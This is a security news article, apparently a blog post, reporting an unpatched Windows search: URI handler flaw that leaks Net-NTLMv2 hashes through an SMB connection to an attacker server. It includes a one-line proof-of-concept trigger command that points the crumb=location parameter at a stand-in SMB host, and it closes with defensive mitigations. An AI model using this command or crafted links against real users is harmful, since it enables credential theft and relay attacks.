Overview Cybersecurity researchers at Huntress have uncovered an unpatched Windows vulnerability that exposes users’ NTLMv2 hashes through the search: URI handler, echoing the same flaw previously seen in CVE‑2026‑33829 affecting the Windows Snipping Tool.
This newly discovered issue allows attackers to steal authentication hashes simply by tricking victims into clicking a malicious link, enabling relay attacks and potential network compromise.
Vulnerability Mechanism
The flaw resides in the Windows Search URI handler, which fails to properly validate parameters passed via crafted URLs.
| Stage | Component | Impact |
|---|---|---|
| Malicious Link Click | User clicks crafted search URI | Initiates SMB connection to attacker’s server |
| NTLMv2 Leakage | crumb=location: parameter | Triggers NTLM authentication |
| Hash Capture | Attacker’s SMB server | Receives victim’s Net‑NTLMv2 hash |
| Relay Attack | Reuse of stolen hash | Enables lateral movement and impersonation |
The exploit can be triggered using a simple command:
Code
start "" "search:query=test&crumb=location:\\10.0.1.100\share"
This mechanism mirrors the Snipping Tool’s ms‑screensketch: URI flaw, which was patched in April 2026.
Technical Insights
The vulnerability stems from improper validation of UNC paths within the search: URI handler, allowing outbound SMB connections to attacker‑controlled servers.
Researchers confirmed that the NTLMv2 hash leakage occurs under identical conditions to previous URI handler bugs, including CVE‑2023‑35636, which exploited the crumb parameter for credential theft.
According to Huntress researcher Andrew Schwartz,
“It used the same NTLM leakage mechanism, produced the same Net‑NTLMv2 leak, had the same prerequisites, and carried the same Moderate rating.”
Despite responsible disclosure on April 15, 2026, Microsoft declined to patch the issue, stating that only Important and Critical severity cases meet their servicing threshold.
Mitigation Steps
Until Microsoft releases a fix, defenders should:
- Block outbound SMB traffic on hosts that don’t require it (TCP 445 and 139).
- Enforce SMB signing to prevent captured hashes from being relayed.
- Disable NTLM authentication across enterprise systems.
- Educate users to avoid clicking suspicious links embedded in emails or web pages.
These measures can significantly reduce exposure to hash relay attacks and credential impersonation.
Expert in the Cloud Insight
The Windows Search URI vulnerability underscores how legacy protocols and URI handlers remain fertile ground for exploitation. A single unvalidated parameter can bridge the gap between local user interaction and network‑level credential theft.
For defenders, the takeaway is clear: disable unused protocols, monitor outbound traffic, and treat URI handlers as attack surfaces — not conveniences.
Leave a Reply